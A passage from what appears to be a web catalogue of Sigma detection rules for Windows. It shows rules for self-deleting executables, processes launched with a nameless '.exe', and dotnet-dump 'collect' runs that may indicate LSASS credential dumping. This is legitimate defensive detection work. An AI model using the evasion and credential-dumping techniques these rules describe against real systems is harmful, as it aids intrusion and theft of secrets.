Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.
references:
- https://github.com/joaoviictorti/RustRedOps/tree/ce04369a246006d399e8c61d9fe0e6b34f988a49/Self_Deletion
author: Max Altgelt (Nextron Systems)
date: 2024-09-03
tags:
- attack.stealth
logsource:
product: windows
category: file_delete
detection:
selection:
TargetFilename|fieldref: Image
condition: selection
falsepositives:
- Some false positives are to be expected from uninstallers.
level: medium
Convert to SIEM query
medium
Process Launched Without Image Name
Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections.
view Sigma YAML
title: Process Launched Without Image Name
id: f208d6d8-d83a-4c2c-960d-877c37da84e5
status: test
description: Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections.
references:
- https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
author: Matt Anderson (Huntress)
date: 2024-07-23
tags:
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\.exe'
condition: selection
falsepositives:
- Rare legitimate software.
level: medium
Convert to SIEM query
medium
Process Memory Dump Via Dotnet-Dump
Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
view Sigma YAML
title: Process Memory Dump Via Dotnet-Dump
id: 53d8d3e1-ca33-4012-adf3-e05a4d652e34
status: test
description: |
Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
references:
- https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect
- https://twitter.com/bohops/status/1635288066909966338
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-14
tags:
- attack.stealth
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\dotnet-dump.exe'
- OriginalFileName: 'dotnet-dump.dll'
selection_cli:
CommandLine|contains: 'collect'
condition: all of selection_*
falsepositives:
- Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated
level: medium
Convert to SIEM query
Showing 951-1000 of 1,492